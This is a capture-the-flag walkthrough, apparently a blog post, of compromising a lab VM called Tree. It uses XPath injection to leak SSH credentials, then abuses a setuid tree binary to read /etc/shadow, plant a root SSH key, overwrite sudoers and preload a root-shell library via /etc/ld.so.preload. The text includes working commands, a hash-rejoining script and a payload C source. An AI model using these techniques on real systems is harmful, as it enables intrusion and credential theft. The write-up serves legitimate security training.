Tree

Target notes

QQ group: 660930334

I. Host discovery

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:32 CST
Nmap scan report for 192.168.2.1
Host is up (0.00047s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00054s latency).
MAC Address: 08:00:27:D1:C4:24 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.56
Host is up (0.00051s latency).
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.11 seconds

Target IP: 192.168.2.56

II. Port scanning

1. Full TCP port scan

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap --min-rate 10000 -p- 192.168.2.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:33 CST
Nmap scan report for 192.168.2.56
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.65 seconds

Open ports: 22, 80

2. Service and version scan

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:33 CST
Nmap scan report for 192.168.2.56
Host is up (0.00093s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds

3. UDP port scan

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# nmap -sU --top-ports 100 192.168.2.56
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-13 21:34 CST
Nmap scan report for 192.168.2.56
Host is up (0.00047s latency).
All 100 scanned ports on 192.168.2.56 are in ignored states.
Not shown: 60 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F1:AB:D3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.94 seconds

No UDP service is confirmed open: 60 ports answered with ICMP port-unreachable (closed) and the remaining 40 are open|filtered, meaning they simply did not respond, which is normal for UDP without a service-specific probe (add -sV if they need to be resolved). Nothing here is worth chasing before the web port.

III. Web exploitation

Port 80 serves a user search page.

1. Directory enumeration

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# gobuster dir -u http://192.168.2.56/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.56/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,bak,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 272]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

No other directories or files were found, so the search form on index.php is the only attack surface.

2. XPath injection

Submitting a user name shows that it is sent as a ?username= query parameter.

The parameter looked injectable, and the classic `' or '1'='1` payload (it works against SQL and XPath string comparisons alike; the summary below identifies this one as XPath injection) returned the user yolo together with the password 06f5086772e0.

IV. Getting a shell as yolo

Log in over SSH with the recovered credentials:

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# ssh yolo@192.168.2.56
yolo@192.168.2.56's password:
Linux Tree 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
yolo@Tree:~$ id
uid=1000(yolo) gid=1000(yolo) groups=1000(yolo)

USER FLAG

yolo@Tree:~$ cat user.txt 
flag{user-df31759540dc28f75a20f443a19b1148}

V. Privilege escalation

sudo -l asks for a password, so there are no sudo rules usable without one:

yolo@Tree:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for yolo:
sudo: a password is required

Under /home there is a second user, cnext, whose home directory is not readable by yolo:

yolo@Tree:/$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Jul 11 07:53 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
drwx------ 2 cnext cnext 4096 Jul 11 07:54 cnext
drwxr-xr-x 2 yolo yolo 4096 Jul 11 08:05 yolo

Listing setuid files turns up /usr/bin/tree, which is not setuid on a normal install:

yolo@Tree:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/tree
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Privilege escalation via tree

Check what the binary can do from its help output; the interesting options are --fromfile (read a file), -o (write a file) and -i/--noreport (keep the written data clean):

yolo@Tree:~$ /usr/bin/tree --help
usage: tree [-acdfghilnpqrstuvxACDFJQNSUX] [-H baseHREF] [-T title ]
[-L level [-R]] [-P pattern] [-I pattern] [-o filename] [--version]
[--help] [--inodes] [--device] [--noreport] [--nolinks] [--dirsfirst]
[--charset charset] [--filelimit[=]#] [--si] [--timefmt[=]<f>]
[--sort[=]<name>] [--matchdirs] [--ignore-case] [--fromfile] [--]
[<directory list>]
------- Listing options -------
-a All files are listed.
-d List directories only.
-l Follow symbolic links like directories.
-f Print the full path prefix for each file.
-x Stay on current filesystem only.
-L level Descend only level directories deep.
-R Rerun tree when max dir level reached.
-P pattern List only those files that match the pattern given.
-I pattern Do not list files that match the given pattern.
--ignore-case Ignore case when pattern matching.
--matchdirs Include directory names in -P pattern matching.
--noreport Turn off file/directory count at end of tree listing.
--charset X Use charset X for terminal/HTML and indentation line output.
--filelimit # Do not descend dirs with more than # files in them.
--timefmt <f> Print and format time according to the format <f>.
-o filename Output to file instead of stdout.
------- File options -------
-q Print non-printable characters as '?'.
-N Print non-printable characters as is.
-Q Quote filenames with double quotes.
-p Print the protections for each file.
-u Displays file owner or UID number.
-g Displays file group owner or GID number.
-s Print the size in bytes of each file.
-h Print the size in a more human readable way.
--si Like -h, but use in SI units (powers of 1000).
-D Print the date of last modification or (-c) status change.
-F Appends '/', '=', '*', '@', '|' or '>' as per ls -F.
--inodes Print inode number of each file.
--device Print device ID number to which each file belongs.
------- Sorting options -------
-v Sort files alphanumerically by version.
-t Sort files by last modification time.
-c Sort files by last status change time.
-U Leave files unsorted.
-r Reverse the order of the sort.
--dirsfirst List directories before files (-U disables).
--sort X Select sort: name,version,size,mtime,ctime.
------- Graphics options -------
-i Don't print indentation lines.
-A Print ANSI lines graphic indentation lines.
-S Print with CP437 (console) graphics indentation lines.
-n Turn colorization off always (-C overrides).
-C Turn colorization on always.
------- XML/HTML/JSON options -------
-X Prints out an XML representation of the tree.
-J Prints out an JSON representation of the tree.
-H baseHREF Prints out HTML format with baseHREF as top directory.
-T string Replace the default HTML title and H1 header with string.
--nolinks Turn off hyperlinks in HTML output.
------- Input options -------
--fromfile Reads paths from files (.=stdin)
------- Miscellaneous options -------
--version Print version and exit.
--help Print usage and this help message and exit.
-- Options processing terminator.

Method one: read /etc/shadow

--fromfile makes tree read a list of paths from the file it is given, and because the binary is setuid root that file can be anything root can read, such as /etc/shadow. Two side effects to keep in mind: entries are sorted by name (add -U to keep the file's order), and any line containing a / is split at the slashes and printed as nested entries, which is what happens to the root and yolo hashes below. The ld.so ERROR line at the top is unrelated to this step (see method four).

yolo@Tree:/tmp$ /usr/bin/tree --fromfile -i /etc/shadow
ERROR: ld.so: object '/tmp/pe.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
/etc/shadow
_apt:*:20166:0:99999:7:::
backup:*:20166:0:99999:7:::
bin:*:20166:0:99999:7:::
cnext:$6$ZjmfcSILA.G5sfyX$F40LCYH.m1HpdKtDj2zZBxExp41bY1XE.WqmagM27SNF0X0ejkj4T5ys2PTPGaLdNNj2oGsJyJrh42J4J.gBq.:20280:0:99999:7:::
daemon:*:20166:0:99999:7:::
games:*:20166:0:99999:7:::
gnats:*:20166:0:99999:7:::
irc:*:20166:0:99999:7:::
list:*:20166:0:99999:7:::
lp:*:20166:0:99999:7:::
mail:*:20166:0:99999:7:::
man:*:20166:0:99999:7:::
messagebus:*:20166:0:99999:7:::
mysql:!:20280:0:99999:7:::
news:*:20166:0:99999:7:::
nobody:*:20166:0:99999:7:::
proxy:*:20166:0:99999:7:::
root:$6$gj1.TfiC99BG.F
4$6OvXSQ
hKLq7uGZEyMaXQwmhNV9hSBlsL.Y
Tojwh5wBlJU
gPeLmwiUo
dkHwBrenDpo253k6Eqq0Mu0qXtz.:20280:0:99999:7:::
sshd:*:20166:0:99999:7:::
sync:*:20166:0:99999:7:::
sys:*:20166:0:99999:7:::
systemd-coredump:!!:20166::::::
systemd-network:*:20166:0:99999:7:::
systemd-resolve:*:20166:0:99999:7:::
systemd-timesync:*:20166:0:99999:7:::
uucp:*:20166:0:99999:7:::
www-data:*:20166:0:99999:7:::
yolo:$6$Y6rR2ERG
lJ8f18x$HWqyDphsZc0zWb.9fVcoQpO9W9ytUKoud8bI30D7X
Nyo.89DLGVBbM2gDl3nuiE
jEMS0I7H1d.PifuJARrW
:20280:0:99999:7:::

9 directories, 28 files

Reassemble the hash. The root entry was printed across six lines because its SHA-512 crypt hash contains five / characters; saving those lines to hash.txt and joining them with / restores the entry (the trailing / comes from the final newline and is not part of it):

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# cat hash.txt | tr '\n' '/'
root:$6$gj1.TfiC99BG.F/4$6OvXSQ/hKLq7uGZEyMaXQwmhNV9hSBlsL.Y/Tojwh5wBlJU/gPeLmwiUo/dkHwBrenDpo253k6Eqq0Mu0qXtz.:20280:0:99999:7:::/
┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# vi hash.txt

┌──(root㉿kali)-[/miao/maze-sec/tree]
└─# cat hash.txt
root:$6$gj1.TfiC99BG.F/4$6OvXSQ/hKLq7uGZEyMaXQwmhNV9hSBlsL.Y/Tojwh5wBlJU/gPeLmwiUo/dkHwBrenDpo253k6Eqq0Mu0qXtz.:20280:0:99999:7:::/
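
The manual tr/vi step above generalises. As an added example that is not part of the original writeup, the POSIX shell/awk helper below undoes tree's splitting for a whole shadow dump: it joins consecutive lines with / until the accumulated text has the eight : separators of a shadow record, skips the top-level entry (the file name tree was given) and the summary line, and then keeps only accounts with a real hash in the user:hash form john accepts. The sample input is constructed from the root and yolo lines exactly as tree printed them above plus one ordinary entry; the function names are this example's own.

```shell
#!/bin/sh
# Reassemble shadow entries from `tree --fromfile -i --noreport` output.
# tree treats every '/' in an input line as a path separator, so an entry whose
# crypt(3) hash contains '/' is printed as several consecutive lines. A shadow
# record has exactly 8 ':' separators, so lines are joined with '/' until the
# accumulated text has 8 colons. (Helper names are this example's own.)
rejoin_shadow() {
    awk '
        NR == 1 && $0 !~ /:/          { next }   # top entry: the file name tree was given
        /^[0-9]+ director(y|ies), /   { next }   # summary line if --noreport was omitted
        {
            acc = (acc == "") ? $0 : acc "/" $0
            tmp = acc
            if (gsub(/:/, ":", tmp) == 8) { print acc; acc = "" }
        }
        END { if (acc != "") print "incomplete entry: " acc > "/dev/stderr" }
    '
}

# Keep only accounts with a real hash (field 2 starts with "$"), in the
# user:hash form john accepts; "*" and "!" entries are not crackable.
crackable_hashes() {
    rejoin_shadow | awk -F: '$2 ~ /^\$/ { print $1 ":" $2 }'
}

# Constructed sample: the root and yolo lines exactly as tree printed them
# on the target (see the listing above), plus one ordinary entry.
SAMPLE_TREE_OUTPUT=$(cat <<'EOF'
/etc/shadow
backup:*:20166:0:99999:7:::
root:$6$gj1.TfiC99BG.F
4$6OvXSQ
hKLq7uGZEyMaXQwmhNV9hSBlsL.Y
Tojwh5wBlJU
gPeLmwiUo
dkHwBrenDpo253k6Eqq0Mu0qXtz.:20280:0:99999:7:::
yolo:$6$Y6rR2ERG
lJ8f18x$HWqyDphsZc0zWb.9fVcoQpO9W9ytUKoud8bI30D7X
Nyo.89DLGVBbM2gDl3nuiE
jEMS0I7H1d.PifuJARrW
:20280:0:99999:7:::
9 directories, 28 files
EOF
)

# Prints the two john-ready lines for root and yolo.
printf '%s\n' "$SAMPLE_TREE_OUTPUT" | crackable_hashes
```

On the box the real pipeline is `/usr/bin/tree --fromfile -i -U --noreport /etc/shadow 2>/dev/null | crackable_hashes > hash.txt` followed by `john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`. One limitation of reading through tree: two lines whose text is identical up to a / are merged into one subtree, so arbitrary files can lose data; shadow lines start with a unique user name, so it does not arise here.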

Then crack the hash with john.

Method two: write an SSH public key

  • Generate a key pair as yolo

    yolo@Tree:/tmp$ ssh-keygen -t ed25519
    Generating public/private ed25519 key pair.
    Enter file in which to save the key (/home/yolo/.ssh/id_ed25519):
    Created directory '/home/yolo/.ssh'.
    Enter passphrase (empty for no passphrase):
    Enter same passphrase again:
    Your identification has been saved in /home/yolo/.ssh/id_ed25519
    Your public key has been saved in /home/yolo/.ssh/id_ed25519.pub
    The key fingerprint is:
    SHA256:6YV81WtNfALzmF6TX2c1xwtA5LxIfgvpB5NrJKUOF1o yolo@Tree
    The key's randomart image is:
    +--[ED25519 256]--+
    | o++ oo|
    | o O o=|
    | E o o+ O O|
    | o.*o+o.. X+|
    | o +SXoo. o o|
    | +.+o* .. |
    | ..+ o |
    | . . |
    | |
    +----[SHA256]-----+
  • View the public key

    yolo@Tree:/tmp$ cat /home/yolo/.ssh/id_ed25519.pub 
    ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqcIkl5fR2GPPr5t6rvJBm0U/5DaX5S36K0tw5B8fFz yolo@Tree
  • Write the public key into /root/.ssh/authorized_keys. The key string is passed in place of the list file: tree prints that argument as the top-level entry into the output file before it fails to open it as a file, so the "Error opening ... for reading." message is expected and goes to stderr, while -n keeps colour codes and --noreport keeps the summary line out of the written file. -o does not create directories, so /root/.ssh must already exist (it did here).

    yolo@Tree:/tmp$ /usr/bin/tree --fromfile -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqcIkl5fR2GPPr5t6rvJBm0U/5DaX5S36K0tw5B8fFz yolo@Tree' -n --noreport -o /root/.ssh/authorized_keys
    Error opening ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqcIkl5fR2GPPr5t6rvJBm0U/5DaX5S36K0tw5B8fFz yolo@Tree for reading.
  • Connect as root with the matching private key

    yolo@Tree:/tmp$ ssh root@127.0.0.1

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Fri Jul 11 06:57:11 2025 from 192.168.3.94
    root@Tree:~# id
    uid=0(root) gid=0(root) groups=0(root)

Method three: write sudoers

Prepare the rule in /tmp/sudoer and check how tree renders it:

yolo@Tree:/tmp$ vi sudoer
yolo@Tree:/tmp$ /usr/bin/tree --fromfile --noreport -i /tmp/sudoer
/tmp/sudoer
yolo ALL=(ALL) NOPASSWD: ALL

Write it over /etc/sudoers:

yolo@Tree:/tmp$ /usr/bin/tree --fromfile --noreport -i /tmp/sudoer -o /etc/sudoers
yolo@Tree:/tmp$ sudo -l
/etc/sudoers:1:12: syntax error
/tmp/sudoer
User yolo may run the following commands on Tree:
(ALL) NOPASSWD: ALL

The first line of the written file is the list file's name, /tmp/sudoer, which is the syntax error sudo reports at line 1; sudo still parses the rule on line 2. This works because -o truncates the existing root-owned, mode 0440 /etc/sudoers in place instead of creating a new file, so sudo's ownership and permission checks still pass. The original sudoers content is destroyed, though, so read a copy out first (method one) if it has to be restored. Escalate:

yolo@Tree:/tmp$ sudo /bin/bash -p
/etc/sudoers:1:12: syntax error
/tmp/sudoer
^
ERROR: ld.so: object '/tmp/pe.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
root@Tree:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

Method four: LD_PRELOAD / ld.so.preload

When the dynamic loader starts a program it first reads the LD_PRELOAD environment variable and the configuration file /etc/ld.so.preload and loads the libraries listed there before anything else, whether or not the program depends on them; their initialisers run before the program's own code. The loader ignores LD_PRELOAD for setuid programs, but it still honours /etc/ld.so.preload, which is trusted only because root alone can normally write it. That is exactly the file the setuid tree lets us write.

In short: a preloaded library runs first, in every process, which allows some interesting tricks.

For the libraries a program actually depends on, ld-linux.so searches in this order:
LD_LIBRARY_PATH > /etc/ld.so.cache > /lib > /usr/lib
LD_PRELOAD and /etc/ld.so.preload are not search paths; they add libraries that are loaded ahead of all of these.

Write the payload library:

yolo@Tree:/tmp$ vi pe.c
yolo@Tree:/tmp$ cat pe.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* unlink(), setgid(), setuid(); this include is what the warnings below are about */

/* With -nostartfiles no crt _init is linked in, so this function becomes the
 * library's initialiser and runs in every process that preloads it. */
void _init(){
    unlink("/etc/ld.so.preload");  /* remove the trigger so nothing else preloads us */
    setgid(0);
    setuid(0);                     /* only succeeds with euid 0, i.e. inside a setuid-root program */
    system("/bin/bash");
}

Compile it as a shared library:

yolo@Tree:/tmp$ gcc -fPIC -shared -o pe.so pe.c -nostartfiles
pe.c: In function ‘_init’:
pe.c:6:2: warning: implicit declaration of function ‘unlink’ [-Wimplicit-function-declaration]
6 | unlink("/etc/ld.so.preload");
| ^~~~~~
pe.c:7:2: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
7 | setgid(0);
| ^~~~~~
pe.c:8:2: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
8 | setuid(0);
| ^~~~~~

The implicit-declaration warnings are for unlink, setgid and setuid, which are declared in unistd.h; the library still builds. The writeup does not show the trigger itself, but the "ERROR: ld.so: object '/tmp/pe.so' from /etc/ld.so.preload cannot be preloaded" lines in the earlier sessions show what was done (inferred from those lines): the path /tmp/pe.so was written into /etc/ld.so.preload with the same tree -o primitive, after which the next setuid-root program started (tree itself will do) loads pe.so with euid 0, setuid(0) succeeds, _init removes the preload file and spawns a root shell. Trigger it straight away: while the file exists every process on the box preloads the library, and once /tmp/pe.so is gone (a reboot clears /tmp) every command prints that ERROR line, as seen above.

ROOT FLAG

root@Tree:~# cat root.txt 
flag{root-594359512f516a5f9c80930b6c388d10}

Summary

1. XPath injection

https://xz.aliyun.com/news/7386

2. Privilege escalation via setuid tree

--fromfile reads the contents of an arbitrary file (as a list of paths, so lines are sorted and split at /)
-o writes the output to an arbitrary file (truncating an existing one in place, preserving its owner and mode)
-i and --noreport strip the indentation and the trailing count so the written data is clean

Escalation paths:

  • read files, e.g. /etc/shadow
  • write an SSH public key into /root/.ssh/authorized_keys
  • write /etc/sudoers
  • preload a shared library via /etc/ld.so.preload

Tree
http://miao-sec.github.io/Maze-sec/Tree/
Author: Miao
Published: 14 July 2025
License: BY-MIAO